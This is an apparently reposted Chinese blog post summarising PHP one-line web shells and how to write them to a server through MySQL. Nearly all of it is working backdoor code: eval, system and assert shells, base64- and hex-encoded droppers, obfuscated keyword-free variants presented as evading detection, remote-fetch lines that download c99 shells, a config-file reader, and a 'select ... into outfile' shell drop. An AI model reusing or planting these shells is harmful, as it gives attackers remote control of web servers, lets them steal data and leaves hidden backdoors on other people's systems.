PHP与SQL语句写一句话木马总结
2019-10-11 18:06
1961 查看
一、基础类的一句话--功能仅限于验证漏洞了,实际中非常容易被查出出来:
<?php @eval($_GET["code"])?> <?php @system($_POST["cmd"])?>
二、编码的替换的类型:
<?php @fputs(fopen(base64_decode('bG9zdC5waHA='),w),base64_decode('PD9waHAgQGV2YWwoJF9QT1NUWydsb3N0d29sZiddKTs/Pg=='));?> //会生成<?php @eval($_POST['lostwolf']);?> <script language="php">@fputs(fopen(base64_decode('bG9zdC5waHA='),w),base64_decode('PD9waHAgQGV2YWwoJF9QT1NUWydsb3N0d29sZiddKTs/Pg=='));</script> //php在html内部的一种嵌入方式 <?php fputs (fopen(pack("H*","6c6f7374776f6c662e706870"),"w"),pack("H*","3c3f406576616c28245f504f53545b6c6f7374776f6c665d293f3e"))?> <?php session_start(); $_POST['code'] && $_SESSION['theCode'] = trim($_POST['code']); $_SESSION['theCode']&&preg_replace('\'a\'eis','e'.'v'.'a'.'l'.'(base64_decode($_SESSION[\'theCode\']))','a');?>
三、其他类型:
<?php $_GET[a]($_GET[b]);?> //?a=assert&b=${fputs%28fopen%28base64_decode%28Yy5waHA%29,w%29,base64_decode%28PD9waHAgQGV2YWwoJF9QT1NUW2NdKTsgPz4x%29%29}; <?php assert($_REQUEST["pass"]);?> //菜刀连接 躲避检测 密码pass <?php substr(md5($_REQUEST['x']),28)=='acd0'&&eval($_REQUEST['pass']);?> //菜刀提交 http://192.168.1.5/x.php?x=lostwolf 脚本类型:php 密码为 pass
四、下载类型:
<?php echo copy("http://www.r57.me/c99.txt","lostwolf.php"); ?> <? echo file_get_contents("..//cfg_database.php");?> //显示某文件 <? eval ( file_get_contents("远程shell")) ?> //运行远程shell
五、无关键函数类型:
<?php $_=""; $_[+""]=''; $_="$_".""; $_=($_[+""]|"").($_[+""]|"").($_[+""]^""); ?> <?php ${'_'.$_}['_'](${'_'.$_}['__']);?> http://site/2.php?_=assert&__=eval($_POST['pass']) 密码是pass <?$_="";$_[+""]='_';$_="$_"."";$_=($_[+""]|"").($_[+""]|"").($_[+""]^"");?>
六、补充知识点:
SQL写一句话(MySQL):
select "<?php @system($_POST["pass"]);?>" into outfile "/home/webaccount/projectname/www/*.php" #前面是一句话内容 后面是绝对路径www下的PHP文件,同理其他脚本也可以
以上就是PHP一句话木马小结与SQL语句写一句话木马的详细内容,感谢大家的学习和对脚本之家的支持。
相关文章推荐
- 自己总结的PHP和SQL语句
- php创建一句话后门的sql语句
- 典型SQL 语句总结
- php 里一个sql语句太长,调式时发现sql语句变得不完整了
- 关于预编译语句PreparedStatement 的 setString类方法传NULL值到sql进行预编译时报 POINT EXCEPTION空指针异常总结
- yii框架中findall方法取数据使用总结,包括select各种条件,where条件,order by条件,limit限制以及使用单纯sql语句query时占位符的使用等
- php中sql语句
- 找工作笔试面试那些事儿(10)---SQL语句总结
- Oracle经典sql语句总结@sql-plus重点函数串讲与sql语句案例@中文排序详讲).doc
- SQL语句函数总结
- (实战开发问题总结--SqLite)sqlite实现执行Sql语句返回单行单列功能
- SQL语句的各个关键字的解析过程详细总结
- SQL语句优化个人总结
- 每日学习总结:DropDownList是否已选择验证、存储过程参数为sql字符串问题、将截断字符串或二进制数据。\r\n语句已终止
- Oracle行转列、列转行的Sql语句总结
- 对于MSSQL数据库被插入的木马可用SQL语句批量删除的方法。
- 验证选择每日学习总结:DropDownList是否已选择验证、存储过程参数为sql字符串问题、将截断字符串或二进制数据。\r\n语句已终止
- PHP之Mysql常用SQL语句示例
- 【MYSQL】基础SQL语句总结(二)